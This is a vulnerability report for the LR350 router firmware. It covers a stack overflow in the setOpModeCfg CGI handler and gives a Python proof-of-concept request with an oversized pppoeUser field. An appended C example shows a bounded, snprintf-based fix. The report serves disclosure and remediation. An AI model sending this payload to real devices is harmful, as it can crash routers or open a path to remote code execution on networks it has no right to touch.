Hi, we found a post-authentication stack buffer overflow in the **LR350** (Firmware version V9.3.5u.6369_B20220309), and are contacting you at the first opportunity.
In the function `setOpModeCfg` of the file `/cgi-bin/cstecgi.cgi`, the size of `pppoeUser` is not checked, and the value is copied directly onto the stack via `sprintf`.
PoC
```python
import requests

url = "http://192.168.17.220:80/cgi-bin/cstecgi.cgi"
cookie = {"Cookie": "uid=1234"}
# setOpModeCfg request with an oversized pppoeUser field
data = {
    "topicurl": "setOpModeCfg",
    "proto": "3",
    "switchOpMode": "1",
    "pppoeSpecType": "2",
    "pppoeUser": "a" * 0x1000,
}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)
```
The PC register can be hijacked, which means it can result in RCE.
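For the fix side, a bounded version of the copy described above, as an added example that is not the vendor's code and not part of the original report. The function name `format_pppoe_user`, the limit `PPPOE_USER_MAX` and the output format string are assumptions made for illustration; the firmware's real buffer size and format are not given in the report.

```c
#include <stdio.h>
#include <string.h>

/* Assumed maximum username length; the firmware's real limit is not in the report. */
#define PPPOE_USER_MAX 64

/* Unsafe pattern the report describes (sketch only, not the vendor's code):
 *     char buf[128];
 *     sprintf(buf, "user \"%s\"", pppoeUser);    <- length never checked
 */

/* Hypothetical hardened helper: returns 0 on success, -1 if the value is
 * empty, longer than PPPOE_USER_MAX, or would not fit in out. On failure
 * out is left as an empty string so callers never see a partial value. */
int format_pppoe_user(char *out, size_t outlen, const char *user)
{
    if (out == NULL || outlen == 0 || user == NULL)
        return -1;
    out[0] = '\0';

    /* Bounded length scan: stop one byte past the limit instead of
     * walking an attacker-sized string to its end. */
    size_t n = 0;
    while (n <= PPPOE_USER_MAX && user[n] != '\0')
        n++;
    if (n == 0 || n > PPPOE_USER_MAX)
        return -1;

    /* snprintf never writes past outlen; its return value is the length
     * that was needed, so w >= outlen means the output was truncated. */
    int w = snprintf(out, outlen, "user \"%s\"", user);
    if (w < 0 || (size_t)w >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char buf[128], big[0x1000 + 1];
    memset(big, 'a', 0x1000);          /* constructed input, same size as the PoC */
    big[0x1000] = '\0';
    printf("normal:    %d\n", format_pppoe_user(buf, sizeof buf, "alice"));
    printf("oversized: %d\n", format_pppoe_user(buf, sizeof buf, big));
    return 0;
}
```

Rejecting the oversized value outright, rather than silently truncating it, also lets the CGI handler return an error for the request.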